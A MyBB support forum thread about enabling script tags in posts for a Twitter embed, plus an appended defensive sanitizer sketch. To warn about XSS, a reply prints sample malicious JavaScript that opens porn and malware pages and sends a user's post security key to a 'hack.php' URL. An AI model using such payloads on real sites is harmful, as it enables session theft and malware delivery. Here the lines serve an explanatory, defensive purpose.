MyBB Community Forums

Full Version: How do I enable "script" tags in posts?
Pages: 1 2
How do I enable script tags in posts?

<script blah blah, etc, etc...>  (that's just a made up example)

Anything that uses script tags seems to just show up as plain text.  How do I force it to function as it is intended?  On other forums it works by default, but I can't seem to figure out how to get them to work on mybb.

Thanks!
You would need to edit core files, but you may as well just ask people to hack your forum and spam you with infinite alert boxes, log you out, steal your post keys, embed malicious iframes into your pages, and perform all kinds of XSS attacks on you if you allow people to post script tags. I'd be curious to see what forums you've used that allow people to put arbitrary javascript in posts, it's an incredibly huge security risk.
The code a user is asking me about is a twitter feed embed that requires a script code in order to display properly. I've seen them displayed on many other forums in the past, and I know it's not uncommon for people on forums to include tweets or twitter feeds in posts or in signatures on the web. Is there not a way to enable only select ones, perhaps? I don't think twitter would provide the code with a script requirement if no forums allowed it.
Putting it in your templates, sure. Putting it in a post, no. I can assure you Twitter's first priority when it comes to providing code won't be whether it's able to be embedded into posts on forums. You can't just 'allow' Twitter because you'd need to allow script tags in general. Like I say, do you have an example of a site where people can embed script tags into posts? I mean you might be able to create a custom MyCode for it, but not embed the code straight in.
I know for a fact various free boards have allowed this, but I haven't used the forums in question in some time. It's possible they no longer do. I'm pretty sure a free board called Excoboard allowed them when I last used them, and they also allowed the "hide" code such as this...

<!-- everything here is hidden in the post -->

^which also doesn't work on MyBB.

I wasn't aware script codes in general would open up such risks, though, so it's quite possible Excoboard and whatever other forums have done so in the past were just inferior. Thank you for bringing that to my attention. What about the <!-- hide --> code, though? Is there a way to enable that without opening up risks?
<!-- --> is a HTML comment and it's remarkable that was allowed to be used as well. It sounds like it just had incredibly poor security rather than specifically allowing these things to be used. MyBB has an option to allow HTML in posts, but I think even that stops script tags being used. As for malicious javascript...

window.open('http://somepornsite.com');
jQuery('body').append('</iframe>', {'src':'http://somepornsite.com'});
jQuery('body').append('</iframe>', {'src':'http://somemalwaresite.com'});
jQuery('body').append('</img>', {'src':'http://mysite.com/hack.php?key='+my_post_key});

If this was allowed, I'd have just opened a new window to a porn site, embedded an iframe loading porn, malware, whatever, and I also just stole your post security key allowing me to make actions on your behalf.

Don't allow javascript on your forum :)
You are correct, HTML enabled still disables the codes in question. I have had HTML turned on on my forum for a while.

The reason I ask about the hide code is because we are a roleplaying site and we have a section where we play a game where we try to "trick" other users by hiding certain words and seeing if the person can find them. Sometimes we will hide a word in our sig, or even drawn into an avatar we upload, and the other user has to find and identify them. I think it would be interesting if we could "hide" words right in a post that do not show up when you highlight the whole page. Do you have any ideas that might allow this type of thing but not pose a risk? So far, the closest we have is using the "transparent" font color but when you highlight the whole page, the text shows up and the users already know that trick. lol

As for the Twitter thing, I'll just skip that for now. It was just one user who asked anyway, and I'm not really that familiar with twitter myself so I'd rather not risk trying to do it through MyCodes.
I see, well MyCodes are designed to allow HTML to be used safely, so you could create a MyCode to do this. Go to Admin CP > Configuration > MyCode > Add New MyCode, and use the following for the regular expression and replacement respectively:

\[hide\](.*?)\[/hide\]
<span style="display: none;">$1</span>

Then when you use:

Testing [hide]hello![/hide] the MyCode

This would show as:

Testing the MyCode

However, even with MyCodes, creating one for script tags would still be somewhat risky, but I can have a look at it if you want... was it basically just the tweet feed embed?
Ah, yes I think that would work for the hide code! Very nice! Thank you for the idea!

As for the tweet, here is the code the user sent me and was trying to get to work...

<blockquote class="twitter-tweet" lang="en"><p>It's game time baby! Everything that you know changes tonight. You ready? <a href="https://twitter.com/hashtag/XWF?src=hash">#XWF</a> <a href="https://twitter.com/hashtag/GameTime?src=hash">#GameTime</a></p>&mdash; Kristen Silver (@KristenSilver7) <a href="https://twitter.com/KristenSilver7/statuses/503236344249085952">August 23, 2014</a></blockquote>
<script async src="//platform.twitter.com/widgets.js" charset="utf-8"></script>

Some of that is obviously personalized to that user but as you can see it needs the script widget code at the bottom in order to display her tweet. If you have an easy fix, that would be awesome.
Hmm ok, well it would depend on whether or not you still have/want to keep HTML enabled on your forum. If you allow HTML, then I guess they could post the HTML part, and then for the script bit, add in another MyCode, with these for the regular expression and replacement:

\[twitterwidget\]
<script async src="//platform.twitter.com/widgets.js" charset="utf-8"></script>

So they would basically post this:

<blockquote class="twitter-tweet" lang="en"><p>It's game time baby! Everything that you know changes tonight. You ready? <a href="https://twitter.com/hashtag/XWF?src=hash">#XWF</a> <a href="https://twitter.com/hashtag/GameTime?src=hash">#GameTime</a></p>&mdash; Kristen Silver (@KristenSilver7) <a href="https://twitter.com/KristenSilver7/statuses/503236344249085952">August 23, 2014</a></blockquote>
[twitterwidget]

I didn't initially realise the replacement allowed script tags, but I guess that would be okay as it'd be set up by the admin... so maybe see if that works?
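
Added example, not part of the thread and not MyBB's parser: a sketch of the approach discussed above, where everything a user types is HTML-escaped and only admin-defined tags produce markup. `renderPost`, the `[tweet]` tag and the other names are hypothetical; `[hide]` mirrors the MyCode given earlier, and the minimal blockquote relies on the widget script filling in the tweet from its link.

```javascript
// Added illustration, not MyBB's parser. renderPost and [tweet] are hypothetical names.

// Step 1: escape everything the user typed, so a pasted <script> shows as text.
function escapeHtml(s) {
  const map = { '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#39;' };
  return s.replace(/[&<>"']/g, c => map[c]);
}

// Fixed, admin-chosen markup; the user never supplies any part of this tag.
const WIDGET =
  '<script async src="https://platform.twitter.com/widgets.js" charset="utf-8"></script>';

// Only a strictly shaped tweet URL is accepted: short handle, numeric id.
const TWEET_RE =
  /\[tweet\]https:\/\/twitter\.com\/([A-Za-z0-9_]{1,15})\/status(?:es)?\/(\d{1,20})\[\/tweet\]/g;

// Same pattern as the [hide] MyCode in the thread, matching across newlines.
const HIDE_RE = /\[hide\]([\s\S]*?)\[\/hide\]/gi;

function renderPost(raw) {
  // Step 2: tags are expanded on already-escaped text, so captured groups are inert.
  let html = escapeHtml(raw).replace(
    HIDE_RE,
    // display:none hides the text from view; it is still present in the page source.
    (_, inner) => `<span style="display: none;">${inner}</span>`
  );
  let tweets = 0;
  html = html.replace(TWEET_RE, (_, user, id) => {
    tweets += 1;
    return `<blockquote class="twitter-tweet">` +
      `<a href="https://twitter.com/${user}/status/${id}"></a></blockquote>`;
  });
  // The widget script is emitted once, and only when a valid tweet tag was present.
  return tweets > 0 ? html + WIDGET : html;
}

// Constructed sample posts.
const samples = [
  '<script>alert(1)</script>',
  'Testing [hide]hello![/hide] the MyCode',
  '[tweet]https://twitter.com/KristenSilver7/statuses/503236344249085952[/tweet]',
  '[tweet]https://twitter.com/x/status/1" onmouseover="a[/tweet]',
];
for (const s of samples) console.log(renderPost(s));
```
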